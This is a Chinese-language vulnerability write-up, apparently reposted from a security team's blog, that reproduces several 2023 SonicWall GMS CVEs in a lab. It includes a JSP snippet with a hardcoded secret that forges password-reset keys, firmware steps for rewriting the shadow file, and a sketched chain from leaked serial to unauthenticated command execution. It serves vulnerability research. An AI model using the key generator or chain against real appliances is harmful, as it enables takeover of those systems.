SonicWall GMS 漏洞分析

IoT 6个月前 admin
131 0 0


招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱

[email protected](带上简历和想加入的小组

  • 环境配置

  • 固件提取

  • 漏洞定位

    • CVE-2023-34123

    • CVE-2023-34128

    • CVE-2023-34124

    • CVE-2023-34127

    • CVE-2023-34129

  • 后续

环境配置

进入后需要login,在login界面输入snwlcli,会尝试登录到cli中,在新的login中输入用户名 admin 口令 password进入后,进行网络配置

interface eth0 192.168.1.203 255.255.255.0
route --add default --destination 192.168.1.1
exit

以single server模式部署

SonicWall GMS 漏洞分析
image-20231106165154053

固件提取

使用diskgenius打开,主要关注两个文件

SonicWall GMS 漏洞分析
image-20231105203855124

其中GMSVP对应着后端的处理逻辑,为ext2类型的文件系统,在wsl2挂载时出现问题,使用diskgenius也没办法正常打开,但是在ubuntu22.04可以正常挂载

sudo mount -t ext2 GMSVP-image.ext2 opt

但是也是没有ssh的,发现root.img为squashfs,尝试重新写root.img中的shadow文件,重新启动后失败。分析后发现conf.img也是squashfs,且保存了很多的配置内容,包括httpd等配置。因此重新打包conf.img,首先生成一个sha512的密码,明文为password

sudo apt-get install whois
mkpasswd --method=sha512crypt

参考https://www.anquanke.com/post/id/266078 进行vmdk的转换和挂载

sudo modprobe nbd max_part=8 
sudo qemu-nbd --connect=/dev/nbd0 ./gms_1389.qcow2

修改conf.img并重新打包

unsquashfs conf.img
cd squashfs-root
vim shadow
mksquashfs squashfs-root fake.img
cp fake.img /media/xxxx/ROOT/00/conf.img
sudo qemu-nbd -d /dev/nbd0
qemu-img convert -f qcow2 gms_1389.qcow2 -O gms_1389.vmdk

漏洞定位

看了下官方公告

SonicWall GMS 漏洞分析
image-20231109134200386

具体的细节为

SonicWall GMS 漏洞分析
image-20231109134711614

CVE-2023-34123

由于是虚拟机,因此会进入这个条件

SonicWall GMS 漏洞分析
image-20231109143713211

对应的内容为

SonicWall GMS 漏洞分析
image-20231109143750492

虽然每个机器的serial是不一样的,但是重置密码只用了前六位,而这前六位是一样的

cat /mnt/sysinfo/serial

SonicWall GMS 漏洞分析
image-20231109143946550

但是实际测试后发现,即使使用000C29068982生成resetkey也会有问题,可能是因为复现环境没有license的原因?但是使用password作为key可以进入reset流程,这里直接使用jsp进行key的生成,jsp位于/opt/GMSVP/Tomcat/webapps/sgms/test.jsp

<%@ page import="com.sonicwall.sgms.util.Crypto" %>
<%@ page import="com.sonicwall.sgms.util.Base64" %>
<%

//String sn = "000C29068982";
String sn = (String)request.getParameter("sn");
String key = sn.substring(06)+"d:&!4+O=*wQe~I8f3l";
String restKey;
String plaintext = (String)request.getParameter("pwd"); 
restKey = new String(Base64.encode(Crypto.encrypt3DES(key.getBytes(), plaintext.getBytes(), false,true)));
out.println(restKey);
// https://192.168.147.200/sgms/test.jsp?pwd=password&sn=password
// GfVnXHe62BkacZMdYLyBTQ==
%>

使用该key进行密钥重置,在日志中可以看到如下信息,日志位于/opt/GMSVP/Logs/DbgAppliance0.log

SonicWall GMS 漏洞分析
image-20231110000317658

CVE-2023-34128

tomcat manager使用硬编码,但是开启了ip限制所以没啥用?

SonicWall GMS 漏洞分析
image-20231110110511349

限制了环回地址

SonicWall GMS 漏洞分析
image-20231110110601909

CVE-2023-34124

没有license没办法,没办法复现,没找到对应的接口。

https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb

CVE-2023-34127

对文件进行筛选时,存在命令执行

SonicWall GMS 漏洞分析
image-20231110151845147

CVE-2023-34129

路径穿越

SonicWall GMS 漏洞分析
image-20231110152020269

后续

其他的一些任意文件上传,硬编码没有贴出来,可以反编译成java后beyondcompare这里不在赘述,没找到CVE-2023-34131,结合resetPWD和授权的命令执行是可以未授权RCE的。泄露出serial number是可以重置密码,然后授权执行系统命令的。

– END –

SonicWall GMS 漏洞分析

原文始发于微信公众号(ChaMd5安全团队):SonicWall GMS 漏洞分析

版权声明:admin 发表于 2023年11月13日 上午8:45。
转载请注明:SonicWall GMS 漏洞分析 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...